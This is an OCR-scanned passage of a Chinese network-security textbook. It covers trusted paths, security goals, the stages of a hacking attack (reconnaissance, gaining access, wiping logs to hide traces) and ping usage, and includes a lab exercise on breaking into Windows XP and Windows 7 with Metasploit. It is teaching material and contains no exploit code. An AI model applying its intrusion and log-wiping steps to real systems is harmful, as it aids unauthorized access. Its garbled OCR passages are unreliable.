隐蔽 信道 分 析 。 系 统 开发 者 应 彻底 搜索 隐蔽 信道 ,并 根据 实际 测量 或 工程 估算 确定 
每 一 个 被 标识 信道 的 最 大 带宽 。 

© 可 信和 路 径 。 当 连接 用 户 时 (如 注册 、 更 改 主体 安全 级 ) ,计算 机 信息 系统 可 信 计 算 基 
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提供 它 与 用 户 之 间 的 可 信 通 信 路 径 。 可 信 路 径 上 的 通信 和 只 能 由 该 用 户 或 计算 机 信息 系统 可 
信 计 算 基 激活 , 且 在 逻辑 上 与 其 他 路 径 上 的 通信 相隔 离 , 且 能 正确 地 加 以 区 分 。 

d) 可 信和 恢复 。 计 算 机 信息 系统 可 信 计 算 基 提供 过 程 和 机 制 , 保 证 计算 机 信息 系统 失效 
或 中 断后 ,可 以 进行 不 损害 任何 安全 保护 性 能 的 恢复 。 


48 本 章 小 结 


本 章 主 要 介绍 操作 系统 安全 基础 、Kali Linux, Linux 系统 安全 配置 ,然后 简单 介绍 了 
Linux 自主 访问 控制 与 强制 访问 控制 的 概念 以 及 计算 机 系统 安全 等 级 标准 。 通 过 入 侵 
Windows XP 这 个 例子 ,重点 介绍 了 Metasploit 的 使 用 方法 。 


49 J 题 


1. 填空 题 

a) 是 一 组 面向 机 器 和 用 户 的 程序 ,是 用 户 程 序 和 计算 机 硬件 之 间 的 接口 ,其 
目的 是 最 大 限度 地 ,高 效 地 、 合 理 地 使 用 计算 机 资源 ,同时 对 系统 的 所 有 资源 (软件 和 硬件 资 
源 ) 进 行 管理 。 

(2) 在 计算 机 系统 的 各 个 层次 上 ,硬件 、 x \ 数 据 库 管理 系统 软件 以 及 
应 用 软件 ,各 自在 计算 机 安全 中 都 肩负 着 重要 的 职责 。 

(3) 黑客 和 安全 研究 员 需 要 手边 随时 都 有 整套 的 黑客 工具 ， 恰 是 他 们 所 需 的 ， 
其 预 装 了 许多 黑客 工具 ,包括 nmap、Wireshark、John the Ripper, Aircrack-ng 等 。 

(4) 是 一 款 开 源 的 安全 漏洞 检测 工具 ,几乎 包含 了 渗透 测试 中 所 有 用 到 的 工 
具 , 每 一 种 工具 都 有 其 对 应 的 使 用 环境 ,针对 性 比较 强 。 

2. 思考 与 简 答 题 

(1) 简 述 操作 系统 的 安全 级 别 。 

(2) Linux 系统 的 安全 配置 有 哪些 方面 ? 

G) 简 述 TCSEC。 

3. 上 机 题 

CD 根据 4. 4 节 内 容 ,搭建 实验 环境 .使 用 Metasploit 入 侵 Windows XP., 

(2) 尝试 使 用 Metasploit 入 侵 Windows 7。 
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本 章 学 习 目 标 

。 了解 目前 网 络 的 安全 形式 以 及 网 络 安 全 面临 的 威胁 。 

。 了 解 黑客 攻击 的 步骤 。 

* 掌握 端口 与 漏洞 扫描 工具 以 及 网 络 监听 工具 的 使 用 方法 。 
。 理解 缓冲 区 溢出 的 攻击 原理 。 

。 理解 DoS 与 DDoS 攻击 的 原理 及 其 防范 。 

。 掌握 中 间 人 攻击 技术 。 

* 理解 ARP 欺骗 的 原理 。 

。 掌握 Linux 中 防火 墙 的 配置 。 

。 理解 人 侵 检 测 与 人 侵 防 御 技术 。 

。 了 解 计算 机 病毒 .蠕虫 和 木马 带 来 的 威胁 。 

。 掌握 Windows 和 Linux 中 VPN 的 配置 。 

。 掌握 httptunnel 技术 的 使 用 方法 。 

。 了解 蜜 饶 技 术 。 

* 掌握 Kali Linux 中 使 用 Aircrack-ng 破解 Wi-Fi 密码 技术 。 

* 了 解 无 线 网 络 安全 并 且 会 配置 无 线 网 络 安全 。 

如 今 的 网 络 用 户 普 遍 担心 网 络 钓鱼 .密码 盗 取 、 在 线 欺 诈 以 及 越 来 越 多 病毒 和 木马 等 会 
给 自己 造成 严重 的 损失 。 本 章 将 通过 一 系列 的 实例 介绍 网 络 安全 和 攻防 方面 的 基础 知识 和 
技术 ,帮助 读者 提高 解决 实际 网 络 安全 问题 的 能 力 。 

本 章 介绍 了 端口 与 漏洞 扫描 以 及 网 络 监听 技术 、 缓 冲 区 溢出 攻击 及 其 防范 、DoS 与 
DDoS 攻击 检测 与 防御 、 中 间 人 攻击 技术 、 防 火 墙 技术 、 入 侵 检测 与 入 侵 防 御 技术 、 计 算 机 病 
毒 、VPN 技术 、httptunnel 技术 、Kali Linux 中 使 用 Aircrack-ng 破解 Wi-Fi 密码 技术 、 无 线 
网 络 安 全 等 内 容 。 


51 计算 机 网 络 安全 概述 


美国 早 在 20 世纪 90 年 代 就 提出 了 网 络 战 概念 ,近年 来 更 是 大 力 发 展 网 络 部 队 , 打 着 维 
护 国 家 利益 的 旗号 在 网 络 空间 积极 扩军 备战 。2002 年 12 月 ,美国 海军 率先 成 立 海 军 网 络 
司令 部 ,随后 空军 和 陆军 也 相继 组 建 自己 的 网 络 部 队 。2010 年 5 月 ,美军 建立 网 络 司令 部 ， 
统一 协调 保障 美军 网 络 战 、 网 络 安全 等 与 计算 机 网 络 有 关 的 军事 行动 ,其 司令 部 设 在 华盛顿 
附近 的 马里 兰州 米 德 堡 军事 基地 。 美 军 网 络 司令 部 司令 兼任 美国 国家 安全 局 局 长 。 美 军 网 


络 司令 部 一 开始 编制 只 有 900 人 ,但 2013 年 有 报道 称 将 扩编 至 4900 人 。2014 年 3 HX 
国 国 防 部 长 哈 格 尔 又 宣布 ,国防 部 计划 于 2016 年 将 网 络 部 队 人 数 扩 至 6000 人 。 而 美军 网 
络 司令 部 司令 罗杰斯 在 2014 年 9 月 的 网 络 安全 会 议 上 透露 ,网 络 部 队 人 数 将 在 2016 年 前 
增 至 6200 人 。 美 国 网 军 由 3 个 分 支 组 成 , 除 保护 美国 国内 电网 、 核 电站 等 重要 基础 设施 的 
网 络 部 队 外 ,还 有 协助 海外 部 队 策 划 并 执行 网 络 袭 击 的 “进攻 性 ”部 队 , 以 及 保护 国防 部 内 部 
网 络 的 “防卫 性 ”部 队 。 前 者 已 于 2013 年 9 月 投入 运行 ,后 两 个 分 支 也 在 2015 年 组 建 完成 。 

美空 军 网 络 战 准将 基 斯 西 耶 说 :“ 在 虚拟 的 世界 里 ,你 的 武器 就 是 你 桌 上 的 计算 机 。 空 
军 的 网 络 战场 包括 互联 网 、 移 动 通信 设备 和 用 来 标明 路 边 炸 弹 的 信号 。” 

据 希 赛 网 报道 : 2008 年 4 月 7 日 19 点 左右 起 , 旨 在 “反对 西方 媒体 对 华 不 实 报道 发 出 
中 国人 民 自 己 声音 ”的 中 国 著 名 反 CNN 网 站 遭 到 不 明 黑 客 攻击 ,4 月 8 日 白天 仍 断 断 续 续 
瘫痪 数 次 。 经 过 网 站 相关 人 员 的 积极 修复 ,4 月 8 日 21 点 网 站 恢复 正常 运行 ,但 是 仍然 造 
成 4 月 8 日 凌晨 后 的 部 分 数据 丢失 。 从 中 可 以 看 到 , 随 着 互联 网 越 来 越 快速 的 发 展 ,网 络 攻 
击 会 变 的 愈演愈烈 ,未 来 战争 爆发 将 会 是 敌我 双方 重点 相互 打击 的 目标 ,怎样 阻止 基础 网 络 
被 毁 将 成 为 所 有 国家 当前 不 得 不 面 对 的 严重 问题 。 

在 2001 年 4 月 1 日 美国 侦察 机 撞 毁 我 军用 飞机 ?事件 ,现实 中 双方 表面 波澜 不 惊 , 然 
而 在 互联 网 上 展开 了 明 枪 暗 刀 的 战斗 。 美 国 黑客 人 侵 了 大 量 中 国 网 站 ,中 国 黑 客 随 即 展开 
了 “五 一 卫 国 ”反击 活动 ,双方 黑客 在 互联 网 上 正在 进行 一 场 网 络 大 战 。 在 这 场 网 络 大 战 中 ， 
双方 共有 几 千 个 网 站 被 黑 , 有 些 网 站 直接 崩溃 ,造成 的 损失 难以 估量 。 

2010 年 1 月 12 日 早上 ,伊朗 黑客 利用 * 域 名 劫持 技术 ”, 从 DNS 服务 器 端 下 手 ,劫持 了 
百度 的 域名 ,导致 百度 搜索 网 站 不 能 打开 ,主页 出 现 黑色 ,并 有 伊朗 国旗 和 伊朗 网 军 (iran 
cyber army) 字 样 , 或 者 主页 出 现 “ 网 页 无 法 显示 ”或 “没有 可 以 显示 的 页 面 "等 字样 。 

从 最 近 反 CNN 网 站 被 黑 , 到 更 早 时 候 的 中 美 黑客 大 战 可 以 看 出 ,目前 ,全 世界 的 军事 、 
经 济 、 社 会 .文化 各 个 方面 都 越 来 越 依 赖 于 计算 机 网 络 , 人 类 社会 对 计算 机 的 依赖 程度 达到 
了 空前 的 纪录 。 由 于 计算 机 网 络 的 脆弱 性 ,这 种 高 度 的 依赖 性 是 国家 的 经 济 和 国防 安全 变 
得 十 分 脆弱 ,一 旦 计算 机 网 络 受到 攻击 而 不 能 正常 工作 ,甚至 瘫痪 ,整个 社会 就 会 陷入 危机 。 

随 着 互联 网 时 代 的 到 来 , 越 来 越 多 的 企业 增加 了 在 线 的 业务 模式 .百度 公司 的 客户 其 实 
就 是 典型 的 代表 ,他 们 大 部 分 都 是 通过 网 络 来 吸引 客户 ,一旦 网 站 被 黑客 人 侵 , 将 会 遭受 惨 
重 的 损失 ,甚至 在 被 黑客 连续 的 攻击 下 无 法 持续 经 营 .破产 关门 。 

当今 网 络 战 场 成 为 国家 间 博 弈 的 舞台 ,各 种 先进 的 技术 层出不穷 .各 个 国家 都 在 打造 一 
支 属 于 自己 的 网 络 队伍 ,网 络 战争 也 进入 了 一 个 很 微妙 的 时 期 ,夺取 战争 主动 权 , 不 再 是 子 
弹 枪 炮 ,是 流动 在 网 线 中 的 比特 和 字 节 。 由 于 受 技术 条 件 的 限制 ,很 多 人 对 网 络 安全 的 意识 
仅 停 留 在 如 何 防范 病毒 阶段 ,对 网 络 安全 缺乏 整体 意识 。 比 如 电影 4 虎 胆 龙 威 4》 中 所 描述 
的 ,一 旦 战事 爆发 ,整个 城市 的 交通 灯 、 天 然 气 、 通 信 、 电 力 都 被 黑客 控制 。 也 许 电 影 中 描述 
得 比较 夸张 ,但 是 谁 又 能 预料 到 随 着 互联 网 的 快速 发 展 , 这 一 切 不 会 变 成 可 能 呢 ? 未 来 网 络 
战 的 趋势 ,将 会 是 通过 系统 漏洞 发 送 病毒 ,破坏 对 方 的 计算 机 系统 ,造成 敌 方 指挥 系统 次 痪 ， 
使 其 无 法 正常 工作 。 更 有 其 者 盗 取 机 密 资料 ,向 对 方 发 出 错误 的 作战 引导 信号 ,配合 其 他 形 
式 的 攻击 ,从 而 达到 最 终 的 胜利 目的 。 
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5.1.1 网 络 安全 面临 的 威胁 


互联 网 给 社会 生活 带 来 巨大 变化 、 给 人 们 带 来 诸多 便利 的 同时 ,也 带 来 了 突出 的 网 络 安 
全 问题 和 社会 问题 ,其 中 主要 的 问题 有 : 四 网 络 黑客 攻击 、 网 络 病毒 等 严重 威胁 网 络 运行 安 
全 ; 加 网络 欺诈 、 网 络 盗窃 等 网 络 犯罪 活动 直接 危害 公共 财产 安全 ; 加 网络 淫秽 色情 等 有 
害 信息 严重 危害 未 成 年 人 身心 健康 。 这 些 问 题 日 益 引 起 社会 各 界 的 关注 ,不 仅 是 我 国 而 且 
也 成 为 世界 各 国共 同 面临 的 重大 问题 。 

计算 机 网 络 所 面临 的 威胁 包括 对 网 络 中 信息 的 威胁 和 对 网 络 中 设备 的 威胁 。 影 响 计算 
机 网 络 的 因素 很 多 ,有 些 因素 可 能 是 有 意 的 ,也 有 可 能 是 无 意 的 ; 可 能 是 人 为 的 ,也 可 能 是 
非 人 为 的 ; 还 可 能 是 外 来 黑客 对 网 络 系统 资源 的 非法 使 用 等 。 

人 为 的 恶意 攻击 ,是 计算 机 网 络 面临 的 最 大 威胁 ,敌对 方 的 攻击 和 计算 机 犯罪 都 属于 这 
一 类 。 恶 意 攻击 分 为 以 下 两 种 : 一 种 是 主动 攻击 , 它 以 各 种 方式 有 选择 地 破坏 信息 的 有 效 
性 和 完整 性 ; 另 一 种 是 被 动 攻击 , 它 是 在 不 影响 网 络 正常 使 用 的 情况 下 ,进行 截获 窃取 、 破 
译 以 获得 重要 机 密 信息 。 

网 络 软件 的 漏洞 和 后 门 : 网 络 软件 不 可 能 是 毫 无 缺陷 和 没有 漏洞 的 。 这 些 缺 陷 和 漏洞 
恰恰 是 黑客 进行 攻击 的 首选 目标 。 软 件 的 后 门 一 般 是 软件 开发 人 员 为 了 方便 或 者 不 为 人 知 
的 目的 而 设置 的 ,一 般 外 界 并 不 知晓 ,但 是 一 旦 后 门洞 开 , 该 软件 的 用 户 就 十 分 危险 ,其 后 果 
不 堪 设 想 。 


5.1.2 网 络 安全 的 目标 


网 络 安全 的 目标 主要 是 系统 的 可 靠 性 .可 用 性 、 保 密 性 、 完 整 性 .不 可 抵赖 性 .可 控 性 等 
方面 。 

1. 可 靠 性 

可 靠 性 是 网 络 信息 系统 能 够 在 规定 条 件 下 和 规定 的 时 间 内 完成 规定 功能 的 特性 。 

2. 可 用 性 

可 用 性 是 网 络 信息 可 被 授权 实体 访问 并 按 需求 使 用 的 特性 。 即 网 络 信息 服务 在 需要 
时 ,允许 授权 用 户 或 实体 使 用 的 特性 ,或 者 是 网 络 部 分 受 损 或 需要 降级 使 用 时 , 仍 能 为 授权 
用 户 提供 有 效 服 务 的 特性 。 

3. 保密 性 

保密 性 是 网 络 信息 不 被 泄露 给 非 授权 的 用 户 、 实 体 或 过 程 , 或 供 其 利用 的 特性 。 即 防止 
信息 泄露 给 非 授权 个 人 或 实体 ,信息 只 为 授权 用 户 使 用 的 特性 。 保 密 性 是 在 可 靠 性 和 可 用 
性 基础 之 上 ,保障 网 络 信息 安全 的 重要 手段 。 

4. 完整 性 

完整 性 是 网 络 信息 未 经 授权 不 能 进行 改变 的 特性 。 即 网 络 信息 在 存储 或 传输 过 程 中 保 
持 不 被 偶然 或 蓄意 地 删除 、 修 改 、 伪 造 、 乱 序 、 重 放 、 插 入 等 破坏 和 丢失 的 特性 。 完 整 性 是 一 
种 面向 信息 的 安全 性 , 它 要 求 保持 信息 的 原样 , 即 信息 的 正确 生成 和 正确 存储 和 传输 。 

完整 性 与 保密 性 不 同 ,保密 性 要 求 信息 不 被 泄露 给 未 授权 的 人 ,而 完整 性 则 要 求 信 息 不 
致 受到 各 种 原因 的 破坏 。 影 响 网 络 信息 完整 性 的 主要 因素 有 设备 故障 、 误 码 ( 传 输 、 处 理 和 
存储 过 程 中 产生 的 误 码 , 定 时 的 稳定 度 和 精度 降低 造成 的 误 码 ,各 种 干扰 源 造成 的 误 码 )、 人 
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为 攻击 、 计 算 机 病毒 等 。 

保障 网 络 信息 完整 性 的 主要 方法 有 以 下 几 种 。 

协议 , 通过 各 种 安全 协议 可 以 有 效 地 检测 出 被 复制 的 信息 、 被 删除 的 字段 .失效 的 字段 
和 被 修改 的 字段 。 

纠 错 编码 方法 : 由 此 完成 检 错 和 纠 错 功 能 。 最 简单 和 常用 的 纠 错 编码 方法 是 奇偶 校 
验 法 。 

密码 校 验 和 方法 : 它 是 防止 修改 和 传输 失败 的 重要 手段 。 

数字 签名 : 保障 信息 的 真实 性 。 

公证 : 请 求 网 络 管理 或 中 介 机 构 证 明 信 息 的 真实 性 。 

5. 不 可 抵赖 性 

不 可 抵赖 性 也 称 作 不 可 否认 性 ,在 网 络 信息 系统 的 信息 交互 过 程 中 ,确信 参与 者 的 真实 
同一 性 。 即 所 有 参与 者 都 不 可 能 否认 或 抵赖 曾经 完成 的 操作 和 承诺 。 利 用 信息 源 证 据 可 以 
防止 发 信 方 不 真实 地 否认 已 发 送信 息 , 利 用 递交 接收 证 据 可 以 防止 收 信 方 事后 否认 已 经 接 
收 的 信息 。 


可 控 性 是 对 网 络 信息 的 传播 及 内 容 具 有 控制 能 力 的 特性 。 

概括 地 说 ,网 络 信 息 安 全 与 保密 的 核心 是 通过 计算 机 、 网 络 、 密 码 技术 和 安全 技术 ,保护 
在 公用 网 络 信息 系统 中 传输 、 交 换 和 存储 的 消息 的 保密 性 、 完 整 性 、 真 实 性 、 可 靠 性 、 可 用 性 、 
不 可 抵赖 性 等 。 


5.1.3 网 络 安全 的 特点 


网 络 安全 一 般 具 有 如 下 7 个 特点 。 

1. 网 络 安全 的 涉及 面 广 

从 网 络 安全 所 保护 的 对 象 来 看 ,网 络 安全 包括 : 国家 安全 , 即 如 何 保护 国家 机 密 不 受 网 
络 黑客 的 袭击 而 泄露 ; 商业 安全 , 即 如 何 保护 商业 机 密 、 企 业 资 料 不 遭 窃取 ; 个 人 安全 , 即 
如 何 保护 个 人 隐私 (包括 信用 卡号 码 、 健 康 状况 等 ); 网 络 自身 安全 , 即 如 何 保证 接 和 网际 网 
络 的 计算 机 网 络 不 受 病毒 的 侵袭 而 瘫痪 。 

2. 网 络 安全 涉及 的 技术 层面 深 

如 今 ,互联 网 已 经 深入 了 社会 生活 的 各 个 角落 。 对 个 人 而 言 , 互 联网 改变 了 人 们 的 生活 
方式 ; 对 企业 而 言 ,互联 网 使 企业 能 够 尝试 新 的 经 营 方式 、 营 销 方式 和 内 部 管理 机 制 ; 对 政 
府 而 言 ,互联 网 可 以 帮助 政府 更 好 地 执行 各 种 政府 职能 ,服务 民众 。 可 以 说 ,网 络 已 经 形成 
了 一 个 跟 现 实 社 会 紧密 相关 的 虚拟 社会 ,大 量 的 信息 流 、 资 金 流 和 物流 都 运行 其 上 ,为 了 实 
现 上 述 功能 ,网 络 本 身 就 采用 了 众多 的 新 兴 技 术 。 此 外 ,黑客 所 采用 的 攻击 手段 和 技术 很 多 
都 是 些 以 前 没有 发 现 的 全 新 的 系统 漏洞 ,技术 难度 比较 大 。 这 一 切 都 注定 了 网 络 安全 所 涉 
及 的 技术 层面 不 得 不 深 。 

3. 网 络 安全 的 黑 盒 性 

网 络 安全 是 一 种 以 防 患 于 未 然 为 主 的 安全 保护 ,这 就 注定 了 网 络 安全 产品 的 功能 有 些 
模糊 ,不 像 其 他 应 用 系统 那样 明确 。 如 ,一 种 入 侵 检 测 系统 到 底 能 够 检测 出 哪些 攻击 ,一 般 
用 户 是 没 法 知道 的 。 因 此 ,对 于 网 络 安全 产品 ,中 间 机 构 的 介入 就 非常 关键 。 如 我 国 公安 部 
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网 络 安全 检测 中 心 ,国际 上 的 各 种 认证 机 构 ( 如 国际 计算 机 安全 协会 ICSA) 等 中 介 机 构 的 
介入 ,对 于 安全 产品 的 定位 和 评价 都 很 有 帮助 。 

4. 网 络 安全 的 动态 性 

动态 性 指 的 是 网 络 中 存在 的 各 种 安全 风险 处 于 不 断 的 变化 之 中 ,从 内 因 看 ,网 络 本 身 就 
在 变化 和 发 展 之 中 ,网 络 中 设备 的 更 新 .操作 系统 或 者 应 用 系统 的 升级 .系统 设置 的 变化 , 业 
务 的 变化 等 要 素 都 可 能 导致 新 的 安全 风险 的 出 现 。 从 外 因 看 ,各 种 软 硬 件 系 统 的 安全 漏洞 
不 断 地 被 发 现 、 各 种 网 络 攻击 手段 在 不 断 在 发 展 ,这 些 都 可 能 使 得 今天 还 处 于 相对 安全 状态 
的 网 络 在 明天 就 出 现 了 新 的 安全 风险 。 另 外 ,由 于 国内 外 黑客 和 病毒 方面 的 技术 日 新 月 异 ， 
而 新 的 安全 漏洞 也 层出不穷 。 因 此 ,网 络 安全 必须 能 够 紧 跟 网 络 发 展 的 步伐 ,适应 新 兴 的 黑 
客 技术 , 唯 有 如 此 ,才能 够 确保 网 络 的 安全 。 国 际 上 ,把 这 种 适应 黑客 和 病毒 发 展 技术 的 能 
力 , 作 为 评价 网 络 安全 产品 的 一 个 重要 标准 。 

5. 网 络 安全 的 相对 性 

相对 性 指 的 是 网 络 安全 的 目标 实现 总 是 相对 的 ,由 于 成 本 以 及 实际 业务 需求 的 约束 , 任 
何 的 网 络 安全 解决 方案 都 不 可 能 解决 网 络 中 所 有 的 网 络 安全 问题 ,百分之百 安全 的 网 络 系 
统 是 不 存在 的 ,不 管 网 络 安全 管理 和 安全 技术 实施 多 完善 ,网 络 安全 问题 总 会 在 某 个 情况 下 
发 生 。 网 络 安全 的 这 个 属性 表明 安全 应 急 计 划 、 安 全 检测 ,应急 响应 和 灾难 恢复 等 都 应 该 是 
安全 保障 体系 中 的 重要 环节 。 

任何 网 络 安全 产品 的 安全 保证 都 只 能 说 是 提高 网 络 安全 的 水 平 ,而 不 能 杜绝 危害 网 络 
安全 的 所 有 事件 。 因 此 ,现实 中 的 网 络 安全 领域 ,失败 是 常 有 的 事情 ,只 是 启用 了 网 络 安全 
防护 系统 的 网 络 其 遭 到 攻击 的 可 能 性 低 一 些 ; 即使 遭受 攻击 其 损失 也 小 一 些 而 已 。 不 过 ， 
随 着 安全 基础 设施 建设 力度 的 加 大 ,安全 技术 和 安全 意识 的 普及 , 像 网 上 购物 .电子 交易 等 
所 需要 的 安全 保障 还 是 可 以 达到 我 们 可 以 接收 的 安全 水 平 的 。 

6. 网 络 安全 的 整体 性 

整体 性 指 的 是 网 络 安全 是 一 个 整体 的 目标 ,正如 木 桶 的 装 水 容量 取决 于 最 短 的 木 块 一 
FF ,一 个 网 络 系统 的 安全 水 平 也 取决 于 防御 最 薄弱 的 环节 。 因 此 ,均衡 应 该 是 网 络 安全 保障 
体系 的 一 个 重要 原则 ,这 包括 体系 中 安全 管理 和 安全 技术 实施 、 体 系 中 各 个 安全 环节 、 各 个 
保护 对 象 的 防御 措施 等 方面 的 均衡 ,以 实现 整体 的 网 络 安全 目标 。 

7. 网 络 安全 的 跨国 性 

利用 因特网 传送 信息 时 ,国界 和 地 理 距离 暂时 消失 ,这 为 犯罪 分 子 、 罗 怖 分 子 等 跨 地 域 、 
跨国 界 犯 罪 提供 了 可 能 。 


52 黑客 攻击 简介 


黑客 攻击 是 当今 互联 网 安全 的 主要 的 威胁 。 
5.2.1 黑客 与 骇 客 


黑客 (Hacker) 是 指 那些 尽力 挖 据 计 算 机 程序 功能 最 大 潜力 的 计算 机 用 户 , 依 靠 自 己 掌 
握 的 知识 帮助 系统 管理 员 找 出 系统 中 的 漏洞 并 加 以 完善 。 
115 


骇 客 (Cracker) 是 通过 各 黑客 技术 对 目标 系统 进行 攻击 、 入 侵 或 者 做 其 他 一 些 有 害 于 目 
标 系 统 或 网 络 的 事情 。 

今天 “黑客 "和 “ 骇 客 ” 的 概念 已 经 被 人 们 混淆 ,一 般 都 用 来 指 代 那些 专门 利用 计算 机 和 
网 络 搞 破坏 或 恶作剧 的 人 。 

无 论 是 “黑客 "还 是 “ 骇 客 ”, 他 们 最 初学 习 的 内 容 都 是 本 部 分 所 涉及 的 内 容 , 而 且 掌握 的 
基本 技能 也 都 是 一 样 的 。 


5.2.2 黑客 攻击 的 目的 和 手段 


1. 黑客 攻击 的 目的 

不 同 黑客 进行 攻击 的 目的 也 不 尽 相 同 , 有 的 黑客 是 为 了 窃取 、 修 改 或 者 删除 系统 中 的 相 
关 信 息 , 有 的 黑客 是 为 了 显示 自己 的 网 络 技术 .有 的 黑客 是 为 了 商业 利益 ,而 有 的 黑客 是 出 
于 政治 目的 等 。 

2. 黑客 攻击 的 手段 

黑客 攻击 可 分 为 非 破坏 性 攻击 和 破坏 性 攻击 两 类 。 

非 破坏 性 攻击 : 一 般 是 为 了 扰乱 系统 的 运行 ,并 不 盗窃 系统 资料 ,通常 采用 拒绝 服务 攻 
击 或 信息 炸弹 的 方式 。 

破坏 性 攻击 : 是 以 侵入 他 人 计算 机 系统 .盗窃 系统 保密 信息 、 破 坏 目标 系统 的 数据 为 
目的 。 

黑客 常用 的 攻击 手段 有 密码 破解 .后 门 程序 、 中 间 人 攻击 、 电 子 邮件 攻击 、 信 息 炸 弹 、 拒 
绝 服 务 、 网 络 监听 、 利 用 网 络 系统 漏洞 进行 攻击 、 暴 库 、 注 入 、 旁 注 、Cookie 诈骗 WWW 的 欺 
骗 技术 等 。 


5.2.3 黑客 攻击 的 步骤 


黑客 人 侵 一 个 系统 的 最 终 目 标 一 般 是 获得 目标 系统 的 超级 用 户 ( 管 理 员 权限 ,对 目标 
系统 进行 绝对 控制 ,窃取 其 中 的 机 密 文 件 等 重要 信息 。 黑 客人 和 人 侵 的 步骤 如 图 5-1 所 示 ,一 般 
可 以 分 为 3 个 阶段 : 确定 目标 与 收集 相关 信息 、 获 得 对 系统 的 访问 权力 、 隐 藏 踪迹 。 


HIRA 


扫描 确定 获得 管理 RA 
a B H 目标 信息 息 员 权限 侵 痕迹 


获得 普通 
用 户 权限 


图 5-1 黑客 人 侵 的 步骤 


1. 确定 目标 与 收集 相关 信息 

黑客 对 一 个 大 范围 的 网 络 进行 扫描 以 确定 潜在 的 入 侵 目标 ,锁定 了 目标 后 ,还 要 检查 要 
被 入 侵 目 标的 开放 端口 ,并 且 进 行 服务 分 析 . 获 取 目 标 系统 提供 的 服务 和 服务 进程 的 类 型 和 
版 本 、 目 标 系统 的 操作 系统 类 型 和 版 本 等 信息 .看 是 否 存在 能 够 被 利用 的 服务 ,以 寻找 该 主 
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机 上 的 安全 漏洞 或 安全 弱点 。 

2. 获得 对 系统 的 访问 权力 

当 黑 客 探测 到 了 足够 的 系统 信息 ,对 系统 的 安全 弱点 有 了 了 解 后 就 会 发 动 攻击 ,不 过 黑 
客 会 根据 不 同 的 网 络 结构 不 同 的 系统 情况 而 采用 不 同 的 攻击 手段 。 

黑客 利用 找到 的 这 些 安全 漏洞 或 安全 弱点 ,试图 获取 未 授权 的 访问 权限 ,比如 利用 缓冲 
区 溢出 或 蛮 力 攻击 破解 口令 ,然后 登录 系统 。 再 利用 目标 系统 的 操作 系统 或 应 用 程序 的 漏 
洞 , 试 图 提升 在 该 系统 上 的 权限 ,获得 管理 员 权 限 。 

黑客 获得 控制 权 之 后 ,不 会 马上 进行 破坏 活动 ,不 会 立即 删除 数据 、 涂 改 网 页 等 。 一 般 
入 侵 成 功 后 ,黑客 为 了 能 长 时 间 保 留 和 巩固 他 对 系统 的 控制 权 , 为 了 确保 以 后 能 够 重新 进入 
系统 ,黑客 会 更 改 某 些 系 统 设置 .在 系统 中 置 人 特洛伊 木马 或 其 他 一 些 远程 控制 程序 。 

黑客 下 一 步 可 能 会 窃取 主机 上 的 软件 资料 、 窜 户 名 单 、 财 务 报表 、 信 用 卡号 等 各 种 敏感 
信息 ,也 可 能 什么 都 不 做 ,只 是 把 该 系统 作为 他 存放 黑客 程序 或 资料 的 仓库 ,黑客 也 可 能 会 
利用 这 台 已 经 攻陷 的 主机 去 继续 他 下 一 步 的 攻击 ,比如 继续 入 侵 内 部 网 络 , 或 者 将 这 台 主 机 
作为 DDoS 攻击 的 一 员 。 

3. 隐藏 踪迹 

一 般 入 侵 成 功 后 ,黑客 为 了 不 被 管理 员 发 现 , 会 清除 日 志 、 删 除 复制 的 文件 ,隐藏 自己 的 
踪迹 。 日 志 往 往 会 记录 一 些 黑客 攻击 的 蛛丝马迹 ,黑客 会 删除 或 修改 系统 和 应 用 程序 日 志 
中 的 数据 ,或 者 用 假日 志 覆 盖 它 。 


5.2.4 主动 信息 收集 


信息 收集 对 于 一 次 渗透 来 说 是 非常 重要 的 ,收集 到 的 信息 越 多 ,渗透 的 成 功 概率 就 越 
大 ,前 期 收集 到 的 这 些 信息 对 于 以 后 的 阶段 有 着 非常 重要 的 意义 。 信 息 收 集 方式 可 以 分 为 
两 种 : 主动 和 被 动 。 主 动 信息 收集 方式 : 直接 访问 、 扫 描 目 标 系统 的 行为 。 被 动 信息 收集 
方式 : 利用 第 三 方 的 服务 对 目标 系统 进行 了 解 。 

注意 : 没有 一 种 方式 是 完美 的 ,每 种 方式 都 有 自己 的 优势 ,主动 方式 让 你 能 获取 更 多 的 
信息 ,但 是 目标 主机 可 能 会 记录 你 的 渗透 过 程 。 被 动 方式 让 你 收集 的 信息 相对 较 少 ,但 是 你 
的 行为 不 会 被 目标 主机 发 现 。 在 渗透 一 个 系统 时 ,需要 多 次 的 信息 收集 ,同时 也 要 运用 不 同 
的 收集 方式 ,才能 保证 信息 收集 的 完整 性 。 

主动 收集 会 与 目标 系统 有 直接 的 交互 ,从 而 得 到 目标 系统 相关 的 一 些 情报 信息 。 

1. ping 

ping 是 个 使 用 频率 极 高 的 用 来 检查 网 络 是 否 通畅 或 者 网 络 连接 速度 快慢 的 网 络 命令 ， 
其 目的 就 是 通过 发 送 特定 形式 的 ICMP 包 来 请 求 主机 的 回应 ,进而 获得 主机 的 一 些 属 性 。 
用 于 确定 本 地 主机 是 否 能 与 男 一 台 主 机 交换 (发 送 与 接收 ) 数 据 包 。 如 果 ping 运行 正确 ,就 
可 以 相信 基本 的 连通 性 和 配置 参数 没有 问题 ; 大 体 上 可 以 排除 网 络 访问 层 、 网 卡 、Modem 
的 输入 输出 线路 \ 电 缆 和 路 由 器 等 存在 的 故障 .从 而 减 小 了 问题 的 范围 。 通 过 ping 命令 ,可 
以 探测 目标 主机 是 否 活动 ,可 以 查询 目标 主机 的 机 器 名 ,还 可 以 配合 arp 命令 查询 目标 主机 
的 MAC 地 址 ,可 以 进行 DDoS 攻击 ,有 时 也 可 以 推断 目标 主机 操作 系统 ,还 可 以 直接 ping 
一 个 域名 来 解析 得 到 该 域名 对 应 的 IP 地 址 。 

通过 ping 命令 检测 网 络 故 障 的 一 个 典型 步骤 如 下 。 
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第 1 步 : ping 127.0.0.1。 如 果 不 能 ping 通 ,就 表示 TCP/IP 协议 的 安装 或 运行 存在 
问题 。 

第 2 步 : ping 本 机 IP。 如 果 不 能 ping 通 , 就 表示 本 机 网 络 配 置 或 安装 存在 问题 。 此 
时 ,局 域 网 用 户 要 断 开 网 络 连 接 , 然 后 重新 ping 本 机 IP。 如 果 网 线 断 开 后 能 ping 通 , 就 表 
示 局 域 网 中 的 另 一 台 计 算 机 可 能 配置 了 与 本 机 相同 的 IP 地 址 ,造成 IP 地 址 冲突 。 

第 3 步 : ping 局 域 网 内 其 他 IP。 如 果 不 能 ping 通 , 表 示 子 网 掩 码 的 设置 不 正确 ,或 者 
